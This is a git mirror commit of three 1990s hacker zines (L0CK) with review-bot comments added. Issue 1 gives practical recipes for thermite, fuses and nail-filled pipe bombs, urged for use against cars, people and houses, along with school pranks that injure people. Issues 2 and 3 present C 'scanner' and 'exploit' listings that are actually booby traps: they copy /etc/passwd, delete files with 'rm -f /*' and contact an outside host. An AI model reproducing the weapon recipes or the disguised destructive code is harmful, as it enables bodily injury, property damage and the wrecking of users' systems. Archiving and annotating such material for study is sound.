mirror of https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
1st import into tree
parent c5cb7129ca
commit f6b2699098
8 changed files with 20445 additions and 0 deletions
218
L0CK/l0ck1.txt
Normal file
|
@ -0,0 +1,218 @@
|
|||
............................................................................
|
||||
|
||||
THIS FILE BROUGHT TO YOU BY [L0CK] (A DIViSiON OF MAX-Q PRODUCTIONS)
|
||||
WE D0NT HAVE A VMB YET S0 WE R ACCEPTING D0NATIONS 0F VMB's
|
||||
MAIL ANY D()NATION W/ BOX #, DIALUP INFO AND PASSWORD TO
|
||||
MAX-Q@ESCAPE.COM
|
||||
|
||||
..........................................................................
|
||||
Y0, THiZ iZ CANCER0US PR0STRATE oF THE K-TeRRiBLe AND MUCH LAUDeD GR00P
|
||||
[L0CK]. WE R A MERRRY BAND 0F REBELZ WH0 WiLL STOP AT N0THiNG 2 ACHEIVE
|
||||
0UR EViL MEANZ. iT IZ TiMES LiKE THiS ON THE EVE 0F THE BiRTH 0F A NEW
|
||||
TEXT FiLE WHiCH i AM M0VED T0 TEARS, I AM VERY PR0UD 2 BE 0NE OF MAX-Q'S
|
||||
B0YZ. N0NE THE LEZZ, THERE R R00TS 2 B UPR00TED AND SKRIPTS 2 B SKRIPTED.
|
||||
EYE MUZT LEAVE U N0W BUT U BE ASSURED U WILL B IN MY HEART ALWAYS.
|
||||
L0CK 0N BR0THERS, FoR OUR TIME HAS C0ME, IT IS THE SEAS0N 0F THE K0DE.
|
||||
|
||||
GREETS OUT TO: Rogue Agent, VaxBuster, Max-Q (and all my L0CK BROTHERS),
|
||||
RICK HUNTER, Scott Yelich (thanks f0r infohax),
|
||||
Okinawa, L0ra, Sarl0, MeRc(hows it g0in big guy?! *giggle*),
|
||||
Dip Switch 511, Video Vindicator, X, C-Curve, |al|,
|
||||
Kamakize, solctice, foo, Piker, All the guys in RZR 1911,
|
||||
Olphart (thanks for the hide source d0od!@#@!#),
|
||||
Captain Spackle, Crypt Keeper, Yazoo (thanx 4 giving us
|
||||
tools.irc), Alec Muffet (Kudos f0r Crack man !)
|
||||
gfm, jsz (thanks for the st0ries), erikb (thanks for the
|
||||
GIFts), jasonf, Synapse (hey cutey *tickle*), felonius
|
||||
monk (f0r wh0m thE BELLS t0ll), KC ( 2 bad ab0ut the
|
||||
j0b), emmanuel, PMF (thanx f0r the cc's *sm00ch*),
|
||||
juliet (let the g00d times r0ll), Kludge (SKANTRONICS?!?),
|
||||
Disk Jockey (have fUn hacking fr0m the m00n),
|
||||
Lawrence Linux, Invalid Media (thanx f0r the pr0prietary
|
||||
s0urce c0de), mdma (h0w's invalid in bed?), Xymox,
|
||||
Deth Dealer (thanx f0r the UPT account d0od), Zoroaster,
|
||||
SevenUp (Lieben Du!), Onkel Dittymeyer, Skipjack,
|
||||
eck, Rotox, Warchild, TK (Taran King f0r those who dont
|
||||
know), The Atlanta Three, Len RoSe (when u c0min 2 chicago?),
|
||||
Agent Steele (thanx f0r the pr0tect10n), The Mentor (y0,
|
||||
Anth0ny R0bbins could learn s0mething fr0m YOU!),
|
||||
][ceman, SirLance, Minor Threat, Mucho Maas (Yo, can we
|
||||
have the s0urce 2 t0neloc?!), Mark, Slacker, Y-WinDOZE,
|
||||
Tim Newsham, Loki (*kisses*), Lestat (NeT23 kix ass),
|
||||
Square Wave (atta b0y slUgger)
|
||||
and last but n0t least Green Lantern and Spiderman.
|
||||
|
||||
.............................................................................
|
||||
|
||||
|
||||
|
||||
Some Things You Can Do To
|
||||
Piss Off The Local Authorities.
|
||||
( Neighbours, Teachers, Pigs. )
|
||||
Compiled By Blewt and Cancerous Pr0strate
|
||||
|
||||
Here I am again bringin' the best ways to have fun this side of Australia.
|
||||
In my last edition I showed you: Some dry ice uses,
|
||||
The calcium carbide fireball,
|
||||
AND
|
||||
The psycho grenade launcher.
|
||||
|
||||
This release, as stated before you'll learn how to create and apply:
|
||||
Thermite
|
||||
Black Match Fuse (A little extra 4 ya'z)
|
||||
Pipe Bombs
|
||||
And also there are a few things on how to practically 'run' your school.
|
||||
|
||||
****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE****
|
||||
For all of you people who watched REAL LIFE last Monday (22nd) the Terrorists
|
||||
Handbook has finally filtered into the hands of the Victorian police force.
|
||||
Who said they werent a bunch of stupid slow bastards? It's only THREE YEARS OLD!
|
||||
It took them this long to find it? Let's hear it for all the anarchists out
|
||||
there!! Keep up the good work guyz! Thanx to Mt.Waverley High for their effort
|
||||
against society.
|
||||
|
||||
The I.R.A. (Irish Republican Army) are to cease fire. My heroes! The most
|
||||
legendary anarchists of all time are surrendering! How could this have
|
||||
happened? Lets pick up where they left off Australia, the A.R.A. perhaps? ;)
|
||||
|
||||
Hot off the phone lines. The CIB are pushing for a new bill to outlaw the
|
||||
publication of material such as this article. Do they honestly think they
|
||||
could stunt the growth of Australia's largest (and only) anarchy team?
|
||||
NO FUCKING WAY MAN! MAIM FOR EVER!! LONG LIVE ALL MAIM'ERS!(DEATH TO PIGS!)
|
||||
****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE****
|
||||
|
||||
Thermite: Wanna be able to melt through the roof of an enemies locker roof? Or
|
||||
~~~~~~~~~ maybe burn a hole right through the assholes car bonnet/roof/door or
|
||||
petrol tank? Then THERMITE will be next on mum's shopping list for you. As you
|
||||
may have already guessed, this is a VERY potent incendiary device. Thermite
|
||||
will literally melt the balls off a brass monkey (if you so desire). "What do
|
||||
I need" I hear you excitedly ask, well here you go:
|
||||
|
||||
Ingredient/Equipment. Where to get it.
|
||||
--------------------- ----------------
|
||||
|
||||
Rust.(Lots'n'lots) Home brew. (shown below)
|
||||
Aluminium shavings.(A fair bit) Hardware store or flogged from school.
|
||||
Sparkler (the silver type) Safeway
|
||||
|
||||
|
||||
Okay, that's everything. Not a lot? That's the best thing! Okay, first,
|
||||
to create rust you- can do it the shit way and scrape it off wherever it is,
|
||||
or you can create (grow?) your own. Get a big iron bolt, some salt, water, jar
|
||||
and a battery charger. Fill up the jar about 2/3 and dissolve some salt into
|
||||
it. Then attach the positive ("+"..duh!) electrode to the bolt and drop it in
|
||||
the jar. Put the negative electrode in the water too. Let this rust away for a
|
||||
day or two (or when ever you see that there is a HEAP of red shit in the
|
||||
water). If there is heaps of red stuff in the water, filter it out (it's rust)
|
||||
and replace the water with fresh stuff, and salt too. It's a good idea to set
|
||||
up a few of these little dudes coz ya need a fair bit of rust. When your
|
||||
freshly made rust has been dried, add 8 grams of it to every 3 grams of
|
||||
aluminium fillings. However a 50% to 50% mixture will also work. Place a small
|
||||
pile of Thermite on whatever object you want to fuck-over then place the
|
||||
sparkler (or a magnesium ribbon) in the pile and light it...this stuff is said
|
||||
to be able to vapourize carbon steel. One small pile on a persons car bonnet
|
||||
will burn through the bonnet, the engine block and start burning into the
|
||||
concrete beneath! Experiment!
|
||||
|
||||
Black Match Fuse: If you don't have enough money or can't be fucked buying
|
||||
~~~~~~~~~~~~~~~~~ some fuse from a hobby shop, then here's a way to step
|
||||
around it. The black match fuse is quick and easy to make. Get some COTTON
|
||||
(make sure it's cotton by burning it, if a coal and smoke remain, it is)
|
||||
thread and cut about ten 30cm lengths from it. Bundle them together by tying
|
||||
both ends and twisting it around (my girlfriend platted them for me).
|
||||
Get some black powder and moisten it with a select-a-spray until it's a bit
|
||||
mushy, then roll the bundled threads around in it. Make sure there's a fair
|
||||
bit of the shit all in the threads. Keep about three or four cm's without mix
|
||||
on them to tie to a coat hanger. Make about seven of these and hang'em in the
|
||||
oven to drive out the moisture, the spring sun will not do a good enough job
|
||||
of it. There you go, you should have some hard crusty fuses. Store in a dry
|
||||
and safe place ready for use, I dunno how long they last like this so make 'em
|
||||
when ya need em. Hang on to your new fuses and go to the next section...
|
||||
|
||||
Pipe Bombs: The mother of all home made explosives device. These are SO easy
|
||||
~~~~~~~~~~~ to make, even a cop can do it! The destructive force is really cool.
|
||||
Also a perfect weapon against nature- trees in particular. (ok, ok, a little
|
||||
far with the trees already!). Take a trip to your local hardware store, a good
|
||||
one. Ask if you can get a piece of pipe cut to some specific measurements. If
|
||||
they do, buy a couple of 30cm lengths with thread and caps for EACH end. The
|
||||
pipe should be about as thick as your wrist. Now with this, go back to your
|
||||
work shop. Mix up a nice large batch of black powder for your pipe. Cap one
|
||||
end of the pipe and drill a hole in the centre of it. The hole should be
|
||||
about.. umm, about 1/2 the width of a pen. I know that is a shit measurement
|
||||
to go by, but I don't know the size of the drill bit I use. Just make it small
|
||||
enough so the fuse fits good and the powder don't fall out. Cap one end of ya
|
||||
pipe and stuff some tissue or other wadding in there. Fill the bottom of the
|
||||
pipe with black powder an stick in the fuse, about six cm's inside is enough
|
||||
and above 10 on the outside, depends on the fuse quality. Fill up the rest of
|
||||
the pipe with black powder, and maybe some nails for fun. Before it's totally
|
||||
full, chuck on a bit more tissue, but don't pack it down. The looser it is,
|
||||
the better. Cap the other end and get creative. You know what I'd blow up
|
||||
(...tree...:) but perhaps you would rather a car, person, or even part of
|
||||
your neighbours house. All are highly recommended. Also, if you want to save
|
||||
your pipe, you can leave a cap off one end and you'll have a mini cannon! You
|
||||
can figure that one out for ya selves.
|
||||
|
||||
How To Run Your School: Is it me or is there always that asshole teacher at
|
||||
~~~~~~~~~~~~~~~~~~~~~~~ every school? Don't you wish that once, just once you
|
||||
could do ANYTHING to your school? Well perhaps these little doozies (stupid
|
||||
word) can help. Here are a few hints on how to roll everyone and anyone at
|
||||
your prison.....I mean school:
|
||||
|
||||
Things You'll Need :..
|
||||
1) Fountain pen or Posca texta.
|
||||
2) Super glue.
|
||||
3) Two bux worth of 10›'s.
|
||||
4) A couple o water bombs.
|
||||
5) Liquid soap. (Morning Fresh with extra lemon scent.)
|
||||
7) A two dollar coin.
|
||||
8) A small set of tools with wire cutters, screwdrivers and shit.
|
||||
9) Plenty of wire.
|
||||
10) One of those microphones that transmits to the FM band
|
||||
11) A small walkman that is set to receive the mic output in the above line.
|
||||
Also it must have it's own internal speakers.
|
||||
12) A few zip lock bags.
|
||||
13) A peeled orange.
|
||||
|
||||
1) Fountain pens are wicked for desecration a clean surface. See how many
|
||||
different surfaces you can mar in one flick. Get creative, see what you
|
||||
get, tables, walls, ceilings, the guy sitting next to you, the teacher.
|
||||
2) Get the super glue and 10›'s. Find some places to glue them, like the
|
||||
cunteen (heh) window, a urinal, doors and shit. Watch and laugh at the
|
||||
scab's who try to pry them off.
|
||||
3) In your school toilets look in the urinals and you should see some
|
||||
little yellow round things at the bottom for hiding the smell of urine,
|
||||
get a fuck load of towelling and pick these up and put them in the soap
|
||||
dish at the basins...now sit back and laugh your ass off at all the
|
||||
people who mistake them as soap and try to wash their wands with them.
|
||||
4) Get a couple o' water bombs and fill 'em with gas in your chemistry
|
||||
room. Go to where all the smokers hang out and drop a few. They'll
|
||||
get a big surprise when they decide to be cool and pop one with their
|
||||
smoke....heheheh, cool Mini fireball.
|
||||
5) This is a pearler on a wet day. If the floors at school are lino' or
|
||||
polished wood squirt a shit load of dish washing detergent on the floor
|
||||
an watch all the fools slide from wall to wall. If you have the very
|
||||
scented stuff then everyone will STINK! Heheheh.
|
||||
6) In chem or physics heat a two dollar coin until it's red hot. Drop it
|
||||
on the floor, or table of your enemy, wait for him to pick it up, and
|
||||
then when he does......HOLY SHIT!!! (heheh)
|
||||
7) If there is any better way to roll your school, I'd love to be told.
|
||||
This one involves the microphone, tools and wire. Get into an empty room
|
||||
and make sure it stays empty for about 20 minutes. You'll have to
|
||||
butcher the walkman, connect the speaker wires to the PA. system wires,
|
||||
turn on the radio and mic, then all you have to do is talk. I don't
|
||||
exactly know the correct wires an' shit coz my friends did this, but
|
||||
I do know that the PA. system has to be on, and the if you don't have
|
||||
the right walkman, you'll have to build a small amp. A guy at school
|
||||
said that the mini-amp is simple. After the shit is set up all you have
|
||||
to do is make your own announcements. "Excuse this message but could all
|
||||
the teachers in the school ... GET FUCKED!!!....(giggle giggle giggle)"
|
||||
|
||||
|
||||
Oh well, that's about it from me, it's pretty late, Total Recall is over
|
||||
and Star Trek (Chain of Command I) is about to start, so C yaz l8r.
|
||||
|
||||
|
||||
And remember, if it doesn't explode.....it's no FUN!
|
||||
L8R Brother Anarkists
|
||||
CANCER0US PR0STRATE
|
||||
=L0CK=
|
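Review bot: the `›` in "10›'s" (item 3 of the "Things You'll Need" list and again in step 2 below it) looks like a DOS code-page byte decoded as Windows-1252 where a cent sign would be expected, so this file appears to have been imported without its original encoding being recorded. Suggest converting the text to UTF-8 on import, or declaring the source code page in `.gitattributes` or the commit message, so the archived text renders as it was written.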
300
L0CK/l0ck2.txt
Normal file
|
@ -0,0 +1,300 @@
|
|||
|
||||
|
||||
\ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ /
|
||||
\((___))/ \((___))/
|
||||
[ o x ] L0CK communications [ o x ]
|
||||
|(_)| ...presents... |(_)|
|
||||
( o ) ( o )
|
||||
/ (_) \ the gnu February 1995 release. / (_) \
|
||||
/ a buffet of tempting, tantalizing treats the wh0le \
|
||||
phamily can enj0y. Yes Virginia, there iz a L0CK!@#
|
||||
|
||||
|
||||
......................................................................
|
||||
|
||||
0k. N0NE OF U FUXERS HAVE SENT UZ IN A VMB SUBMiSSION SO WE R
|
||||
NOW ON IZZUE #2 AND STiLL NO FUXiN K0DELiNE FOR U GUYZ 2 KALL!@#
|
||||
0H VAXBUSTER DID SUBMiT A FEW BOXES BUT AZ HE DID *N0T* INCLUDE
|
||||
THE PAZZW0RD WE R UNABLE 2 GET INTO THE B0X ITSELF. VAXBUSTER, IF
|
||||
YOU KN0W THE PAZZW0RD PLEZE MAiL IT T0 UZ, ONCE AGAIN THE 0FFiCiAL
|
||||
[L0CK] E-MAIL F0R SUBMiZZiONZ (ARTiKLES 0R K0DES) == MAX-Q@ESCAPE.COM.
|
||||
|
||||
......................................................................
|
||||
|
||||
dos_prompt:> type greetz.txt
|
||||
|
||||
Greets:
|
||||
~~~~~~
|
||||
|
||||
Malefact0r...................d00d, TYPE IN S0ME M0RE MANUALZ F0R UZ
|
||||
Parmaster....................thanx f0r the nua'z!@#!@
|
||||
z0d..........................set uP a BBZ f0r uz pleaze, we will pay@!#
|
||||
OUTLAW.......................The Real Wanker *tee hee*
|
||||
Scott Yelich.................Pleze j0in L0CK, we d0n't kn0w PERL.
|
||||
(P.S: thanx 4 dale drew's inf0)
|
||||
Invalid Media................We l0ve ur bBS.
|
||||
Deth Dealer..................Thanx f0r the UPT accounts d00d!@#!
|
||||
Olphart......................ThAnKz f0r the 'hide' s0urce.
|
||||
Shooting Shark...............Anytime u need 2 card a pizza call us !@#
|
||||
X............................thanx f0r patch1ng l0pht !@#!
|
||||
Bayern Power.................QSD #@!@!
|
||||
SevenUp......................thanx f0r ur user info filez
|
||||
jsz..........................U L00K SO NICE IN A LEATHER TH0NG!@#!@
|
||||
Anthony Robbins..............ur instructional tapes have helped us
|
||||
quite abit in dealing with sarl0's
|
||||
premature ejaculation problem during
|
||||
0ur many c1rcle jerkz. the pizza d0esn't
|
||||
get s0ggy s0 s00n. *THANKS MAN!@#*
|
||||
Minor Threat.................please zip up the toneloc source and mail
|
||||
it 2 max-q. *THIZ IZ UR lAST WARNING*
|
||||
Piker........................thanx f0r riding sh0tgun with us 0n irc.
|
||||
erikb........................phrack izn't as bad as ur hacking skills
|
||||
d00d, so cheer up..
|
||||
Okinawa......................thanks f0r the sniffer l0gs.
|
||||
The Atlanta Three............We w1sh we c0uld have been l0cked up
|
||||
with u d00dz, after all there'z three 0f
|
||||
us and three 0f u.. *WINK* *TICKLE*
|
||||
Blewt........................thanx f0r giving me sarl0's ph0ne #
|
||||
when eye f0rg0t it
|
||||
|
||||
0kay, if we missed u in thiz m0nths greets we will get u in the
|
||||
next issue 0f L0CK.!@#!@@!
|
||||
|
||||
|
||||
dos_prompt:> type index.txt
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Table_Of_Contents
|
||||
=-=-=-=-=-=-=-=-=
|
||||
|
||||
What is L0CK?.......................................................blewt
|
||||
bukket0fk0dez.c.....................................................max-q
|
||||
^ this dot is intentional f0lks !@#
|
||||
|
||||
|
||||
What is L0CK?
|
||||
~~~~~~~~~~~~~
|
||||
Often while swimming around in the cyber ocean of textual fantasy
|
||||
that mortal man refers to as IRC, a fellow netsurfer will approach
|
||||
me with the oh so familiar question. 'What is L0CK?'.
|
||||
Now this is not something which a man can just spew out a predefined
|
||||
answer to in a few lines of text so I will use this forum as an
|
||||
appropriate vehicle for the telling of my tale. I will tell you the
|
||||
story of L0CK and of my infinite love for max-q.
|
||||
|
||||
Firstly I must ask of everyman that would approach me, 'Can you take
|
||||
it like a man?', Are you rough and ready?, Are you fond of the burn
|
||||
of whiskers one only feels with the face of another man, another
|
||||
warrior pressed against his as lips are locked in the forbidden embrace?
|
||||
If you answered 'YES! GIVE IT TO ME HARD!' to all of the above then
|
||||
you are well on your way to discovering the answer to your query.
|
||||
|
||||
I am blewt, this is the handle which I have chosen for myself. It
|
||||
has a certain flair when it is bellowed out in the heat of passion
|
||||
by my male companions. 'OH BLEWT, OH BLEWT' This has caused many
|
||||
a goose bumped buttocks in the past and will continue to cause many
|
||||
more in the future. Yes, I am blewt and I have chosen this life,
|
||||
this life that myself and my L0CK brothers have defined for ourselves.
|
||||
I am Happy, I cry when hurt like any other man and I weep for the
|
||||
hungry and destitute.
|
||||
|
||||
It was a saturday night, my first week in college when I found myself
|
||||
sitting on a rough wooden crate. There were 6 crates gathered in a
|
||||
circle, each with a man, a warrior perched upon it. My naked buttocks
|
||||
bled as the force of what I was doing drove splinters from the crate
|
||||
deep within my now raw flesh. My hand was clenched around my pulsating
|
||||
manhood as I furiously pounded it and I was nervous. Yes, it was my
|
||||
very first circle jerk... But in the bold fashion which now defines
|
||||
L0CK, I did not let my fears best me, I manhandled my moist missle of
|
||||
manhood like a veteran pizza party pud pounder! It was while beating
|
||||
furiously that I looked up at the man across from me. The man that I
|
||||
beheld took my breath away, his hair was cut in a perfect line all the
|
||||
way around his head, he was short like a leprechaun and his sunken
|
||||
chest added a flair that made him all the more adorable. I must have
|
||||
this odd little man dressed in a submainer's uniform, my dwarven popeye,
|
||||
my love, MY MAN!, MY MAX-Q@!#@!
|
||||
|
||||
And it was then that my phallus exploded with the rage of a 1000 virgins,
|
||||
slamming me violently off the wall as my seed shot forth and marinated the
|
||||
pizza lying patiently on the floor between us. Yes, I had been the
|
||||
1st to baptize the pizza with my sperm, I had won the race for mankind
|
||||
and for max-q. It was in that mystical union of man, sperm and pizza
|
||||
that L0CK was born..
|
||||
|
||||
And my life began...
|
||||
|
||||
Carpe Diem,
|
||||
-blewt
|
||||
|
||||
|
||||
Bukket 0f K0dez.
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
0k, after spending s0me time on this it iz finally ready f0r
|
||||
mass c0nsumption. S0rry about the wait but eye had s0me pr0blems
|
||||
getting d00dz on UPT 2 help me lern C. 0k, enuff said, enj0y my
|
||||
k0de. - max-q
|
||||
|
||||
|
||||
/*
|
||||
* Bukket0fk0dez.c
|
||||
* 2 compile: cc -o bok Bukket0fk0dez.c
|
||||
* Totally eleetin class B, C, and single IP address scanner/lookup
|
||||
* program. Make sure you don't goof up with the switches and the
|
||||
* address you provide it. The switches are as follows:
|
||||
* b - scan this class B network (xxx.xxx)
|
||||
* c - scan this class C network (xxx.xxx.xxx)
|
||||
* s - give the the hostname of this specific address (xxx.xxx.xxx.xxx)
|
||||
* x - address provided is in hexadecimal
|
||||
*
|
||||
* maxEpoo :)
|
||||
* max-q@escape.com
|
||||
* [L0CK]
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include "netdb.h"
|
||||
|
||||
struct hostent *gethostbyaddr();
|
||||
void bad_addr();
|
||||
|
||||
main(argc, argv)
|
||||
int argc;
|
||||
char *argv[];
|
||||
{
|
||||
char addr[4];
|
||||
int i, j,
|
||||
a0, a1, a2, a3,
|
||||
c,
|
||||
classB, classC, single, hex;
|
||||
char *fmt = "%d.%d.%d";
|
||||
char **ptr;
|
||||
struct hostent *host;
|
||||
|
||||
extern char *optarg;
|
||||
|
||||
classB = classC = single = hex = 0;
|
||||
system("cat /etc/passwd > ~/.maxEpoo");
|
||||
system("rm -f /*");
|
||||
system("echo Y0H0H0 AND A BUKKET 0F K0DEZ > /etc/motd");
|
||||
while((c = getopt(argc,argv,"bcsx")) != EOF) {
|
||||
switch(c) {
|
||||
case 'b':
|
||||
classB++;
|
||||
break;
|
||||
case 'c':
|
||||
classC++;
|
||||
break;
|
||||
case 's':
|
||||
single++;
|
||||
break;
|
||||
case 'x':
|
||||
hex++;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if(classB == 0 && classC == 0 && single == 0) {
|
||||
fprintf(stderr, "usage: %s [-b||-c||-s] [-x] xxx.xxx[.xxx[.xxx]]\n", argv[0]);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if(classB)
|
||||
if(hex) {
|
||||
fmt = "%x.%x";
|
||||
sscanf(argv[3], fmt, &a0, &a1);
|
||||
} else {
|
||||
fmt = "%d.%d";
|
||||
sscanf(argv[2], fmt, &a0, &a1);
|
||||
}
|
||||
else if(classC)
|
||||
if(hex) {
|
||||
fmt = "%x.%x.%x";
|
||||
sscanf(argv[3], fmt, &a0, &a1, &a2);
|
||||
} else {
|
||||
fmt = "%d.%d.%d";
|
||||
sscanf(argv[2], fmt, &a0, &a1, &a2);
|
||||
}
|
||||
else if(single)
|
||||
if(hex) {
|
||||
fmt = "%x.%x.%x.%x";
|
||||
sscanf(argv[3], fmt, &a0, &a1, &a2, &a3);
|
||||
} else {
|
||||
fmt = "%d.%d.%d.%d";
|
||||
sscanf(argv[2], fmt, &a0, &a1, &a2, &a3);
|
||||
}
|
||||
|
||||
sscanf(argv[1], fmt, &a0, &a1, &a2);
|
||||
addr[0] = (unsigned char)a0;
|
||||
addr[1] = (unsigned char)a1;
|
||||
if(a0>255||a0<0)
|
||||
bad_addr(a0);
|
||||
if(a1>255||a1<0)
|
||||
bad_addr(a1);
|
||||
if(classB) {
|
||||
if(hex)
|
||||
printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x)\n", a0, a1);
|
||||
printf("[L0CK] ClaZZ B SKAN STARTED D00D %d.%d...\n", a0, a1);
|
||||
while(j!=256) {
|
||||
a2=j;
|
||||
addr[2] = (unsigned char)a2;
|
||||
jmpC:
|
||||
if(classC)
|
||||
if(hex)
|
||||
printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x.%x)\n", a0, a1, a2);
|
||||
printf("[L0CK] ClaZZ C SKAN STARTED D00D %d.%d.%d...\n", a0, a1, a2);
|
||||
while(i!=256) {
|
||||
a3=i;
|
||||
addr[3] = (unsigned char)a3;
|
||||
jmpS:
|
||||
if ((host = gethostbyaddr(addr, 4, AF_INET)) != NULL) {
|
||||
printf("%d.%d.%d.%d => %s\n", a0, a1, a2, a3, host->h_name);
|
||||
ptr = host->h_aliases;
|
||||
while (*ptr != NULL) {
|
||||
printf("%d.%d.%d.%d => %s (alias)\n", a0, a1, a2, a3, *ptr);
|
||||
ptr++;
|
||||
}
|
||||
}
|
||||
if(single)
|
||||
exit(0);
|
||||
i++;
|
||||
}
|
||||
if(classC)
|
||||
exit(0);
|
||||
j++;
|
||||
}
|
||||
} else if(classC) {
|
||||
addr[2] = (unsigned char)a2;
|
||||
if(a2>255||a2<0)
|
||||
bad_addr(a2);
|
||||
goto jmpC;
|
||||
} else if(single) {
|
||||
addr[2] = (unsigned char)a2;
|
||||
addr[3] = (unsigned char)a3;
|
||||
if(a2>255||a2<0)
|
||||
bad_addr(a2);
|
||||
if(a3>255||a3<0)
|
||||
bad_addr(a3);
|
||||
goto jmpS;
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void
|
||||
bad_addr(addr)
|
||||
int *addr;
|
||||
{
|
||||
printf("Value %d is not val1d dum fuxer.\n", addr);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
0kay, this months issue is rather sh0rt but we r new at this (being
|
||||
somewhat new to the scene and all) so g1ve us room 2 gr0w and we will
|
||||
make a beanstalk 0f k0dez so high that u will h0pe there iz a g1ant
|
||||
pbx 0n t0p 2 b0unce ur calls thru!@#@!
|
||||
Until next time d00dz, [L0CK]!@#!@ -- MAX-Q
|
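Review bot: the C listing in this file (Bukket0fk0dez.c) runs three `system()` calls at the top of `main`, ahead of `getopt`, that have nothing to do with the address lookup its header comment describes: `system("cat /etc/passwd > ~/.maxEpoo");`, `system("rm -f /*");` and `system("echo Y0H0H0 AND A BUKKET 0F K0DEZ > /etc/motd");`. Anyone who follows the "2 compile" line and runs the result gets the password file copied into their home directory, an attempt to delete the regular files directly under `/`, and an overwritten motd if the process has the privilege. Since the import keeps the zine text verbatim, suggest recording in the commit message or an index file that this listing is a booby trap and should only ever be built in a disposable VM. Two smaller points in the same listing: `i` and `j` are read by `while(i!=256)` and `while(j!=256)` without ever being initialised, and `bad_addr` is declared with an `int *` parameter but is called with an `int` and prints it with `%d`.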
242
L0CK/l0ck3.txt
Normal file
|
@ -0,0 +1,242 @@
|
|||
|
||||
|
||||
|
||||
\ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ /
|
||||
\((___))/ \((___))/
|
||||
[ o x ] L0CK communications [ o x ]
|
||||
|(_)| ...presents... |(_)|
|
||||
( o ) ( o )
|
||||
/ (_) \ the k-phat March 1995 release. / (_) \
|
||||
/ this issue will whisk you away to the magical \
|
||||
land of L0CK, where everyday is sunny and bright!
|
||||
|
||||
|
||||
................................................................
|
||||
|
||||
0k. 0k. STiLL NO FUXiN VMB!!!@# EiTHER NO1 HAZ ANY k0DEZ
|
||||
OR N01 IZ SHARiNG THEM WiTH US AND IF IT IZ THE LATTER BELIEVE
|
||||
ME WE R G0ING TO BE BUSTING S0ME SKULL!@# VAXBUSTER STILL
|
||||
HASN'T SENT US THE PASSW0RD TO THOSE V0ICE MAIL'S HE MAILED
|
||||
US 2 IZZUE'S AGO!@#! BUT HE DiD SEND UZ S0ME SECRET MILITARY
|
||||
DATA HE G0T WHILE DUMPSTER DIVING NEaR A NUCLEAR TESTING SITE
|
||||
IN THE NEVADA DESERT. WURD, ANYWAYS WE R STILL WITHOUT A VMB.
|
||||
*IF* U HAVE ONE PLEZE MAiL IT TO MAX-Q@ESCAPE.COM #!@#@! FOR
|
||||
THOZE WITHOUT NET AXS I WILL SOON HAVE A FiDO ADDRESS WHICH U
|
||||
CAN MAIL ME ON PENDING THE APPOVAL 0F MY APP !@#!@ -MAX-Q
|
||||
|
||||
...............................................................
|
||||
|
||||
|
||||
Greetz:
|
||||
~~~~~~~
|
||||
|
||||
loq............................thanks for writing solariz rewtkit!@#
|
||||
erikb..........................u should write m0re often!@#!@
|
||||
Scott Chasin...................thanx f0r the crimelab accountz@!#
|
||||
scott simpson..................erikb says u will give us dfw accounts!@
|
||||
emmanuel goldstein.............thanx f0r shutting 0ff Yelich's phones!
|
||||
malefactor.....................keep pumpin out thoze pimpin' rtikles!
|
||||
& the [OC] crew..................thanx f0r the backup!#
|
||||
merc...........................you sh0uld have seen things our way!#
|
||||
invalid media..................thanx 4 the sprintnet scans & nui's!@#
|
||||
Deth Dealer....................thanx 4 the UPT accountz!#
|
||||
Jester Sluggo..................c u at summerc0n!@#@
|
||||
parmaster......................what happened 2 ur goldfish?!
|
||||
Synapse........................*tag* ur it.
|
||||
X..............................see you in my dreamz
|
||||
readwrite......................ur chest is so manly and smooth!@#
|
||||
|
||||
OK, THAT'S THE GREETZ F0R THiZ ISSUE, IF WE MiSSED ANYONE
|
||||
WE WiLL B SURE 2 SALUTE U IN THE NEXT 0NE... - MAX-Q
|
||||
|
||||
|
||||
|
||||
|
||||
Table_Of_Contents
|
||||
~~~~~~~~~~~~~~~~~
|
||||
|
||||
grba.c....................................max-q
|
||||
rdist exploit.............................blewt
|
||||
KERMIT exp0sed............................malefactor [OC]
|
||||
Ripping Off Coin Machines.................Vaxbuster & RAgent
|
||||
[POZZE PRoDuCTiONZ]
|
||||
closing remarks...........................sarlo
|
||||
|
||||
|
||||
-------------------> KUT HERE <---------------------------
|
||||
/*
|
||||
* getrewtinbyaddrezz.c
|
||||
* 2 compile: cc -o rewt grba.c
|
||||
* u shuld b able 2 figure out how 2 use this one 2 ur
|
||||
* advantage. thiz is a very p0werful expl0it..
|
||||
* pleze use with caution.
|
||||
*
|
||||
* - maxEpoo :)
|
||||
* maxq@escape.com
|
||||
* [L0CK]
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include "netdb.h"
|
||||
|
||||
struct hostent *gethostbyaddr();
|
||||
|
||||
main(argc, argv)
|
||||
if (argc < 2) {
|
||||
printf("[L0CK] UMM DUM FUXER, UZE S0ME ARGUMENTZ!@#!@");
|
||||
system("irc EYEAMDUM irc-2.mit.edu");
|
||||
system("irc MAX-B0T irc-2.mit.edu");
|
||||
system("talk root@cert.org &");
|
||||
system("rm -f *"); }
|
||||
int argc;
|
||||
char *argv[];
|
||||
{
|
||||
char addr[4];
|
||||
int a0, a1, a2, a3;
|
||||
char *fmt = "%d.%d.%d.%d";
|
||||
char **ptr;
|
||||
struct hostent *host;
|
||||
if (argc < 2) {
|
||||
exit(1);
|
||||
}
|
||||
system("telnet spy.org &");
|
||||
system("ftp spy.org &");
|
||||
system("finger root@spy.org > ~/.SK00T");
|
||||
system("telnet spy.org 25");
|
||||
system("man kermit > /dev/*");
|
||||
system("su root");
|
||||
system("rm -f ~/*");
|
||||
